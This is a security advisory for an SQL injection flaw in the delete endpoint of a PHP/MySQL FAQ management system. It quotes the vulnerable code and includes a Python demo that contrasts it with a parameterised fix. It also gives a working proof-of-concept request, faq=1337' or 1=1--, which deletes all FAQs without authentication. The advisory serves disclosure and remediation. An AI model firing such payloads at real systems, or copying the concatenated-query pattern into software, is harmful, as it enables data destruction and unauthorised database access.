Credits:
Reigz Macolor (https://github.com/reigz/)
Tested On:
Affected Version:
FAQ Management System Using PHP and MySQL 1.0
Affected Site Page:
/faq-management-system/endpoint/delete-faq.php
Affected Code:
delete-faq.php:
Even if there is an attempt to use prepared statements, the code actually receives the user input via the faq parameter and interpolates it into $query before prepare() is called, so the statement is prepared with the user-supplied value already embedded in the SQL text.
...
if (isset($_GET['faq'])) {
    $faq = $_GET['faq'];   // untrusted input, used without validation
    try {
        // $faq is concatenated into the SQL string, so prepare() receives an already-injected query
        $query = "DELETE FROM tbl_faq WHERE tbl_faq_id = '$faq'";
        $stmt = $conn->prepare($query);
        $query_execute = $stmt->execute();
...
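To make the difference between "calling prepare()" and "actually binding the parameter" concrete, here is an added example (not the project's code) that reproduces the delete-faq.php pattern in Python with an in-memory SQLite table standing in for the MySQL tbl_faq, beside the hardened form that passes the id as a bound parameter. The table layout and FAQ rows are constructed for the demonstration; binding fixes the injection but does not add the missing authentication check.

```python
import sqlite3

# Constructed sample rows; the real application's schema may differ.
SEED_FAQS = [
    (1, "How do I reset my password?"),
    (2, "Where is the login page?"),
    (3, "Who do I contact for support?"),
]


def fresh_db():
    """In-memory stand-in for the application's tbl_faq table."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE tbl_faq (tbl_faq_id INTEGER PRIMARY KEY, tbl_faq_question TEXT)"
    )
    conn.executemany("INSERT INTO tbl_faq VALUES (?, ?)", SEED_FAQS)
    return conn


def delete_faq_vulnerable(conn, faq):
    """Mirrors delete-faq.php: the value is interpolated into the SQL text
    *before* the statement is prepared, so preparing it protects nothing.
    Returns the number of rows deleted."""
    query = f"DELETE FROM tbl_faq WHERE tbl_faq_id = '{faq}'"
    return conn.execute(query).rowcount


def delete_faq_fixed(conn, faq):
    """Hardened form: the SQL text is a constant and the id travels as a
    bound parameter, so the database only ever treats it as data.
    Validating that faq is an integer before this call is a further layer."""
    return conn.execute(
        "DELETE FROM tbl_faq WHERE tbl_faq_id = ?", (faq,)
    ).rowcount


def remaining(conn):
    """Rows left in tbl_faq after a delete attempt."""
    return conn.execute("SELECT COUNT(*) FROM tbl_faq").fetchone()[0]


if __name__ == "__main__":
    # The advisory's PoC value, URL-decoded ('+' -> space).
    payload = "1337' or 1=1-- "
    c = fresh_db()
    print("vulnerable:", delete_faq_vulnerable(c, payload), "deleted,", remaining(c), "left")
    c = fresh_db()
    print("fixed:     ", delete_faq_fixed(c, payload), "deleted,", remaining(c), "left")
```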
Related CWE:
CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
Allows SQL injection by placing untrusted input into a query executed on the backend; for the PoC, all FAQs are deleted without any authentication.
Execute the DELETE query using the payload 1337'+or+1=1--+ via the faq parameter.
GET /faq-management-system/endpoint/delete-faq.php?faq=1337'+or+1=1--+ HTTP/1.1
Host: localhost
Connection: close
DELETES all FAQs without authentication.
An attacker can do the following:
- Run any database query and have same permission as the web application (default for this Web Application is root).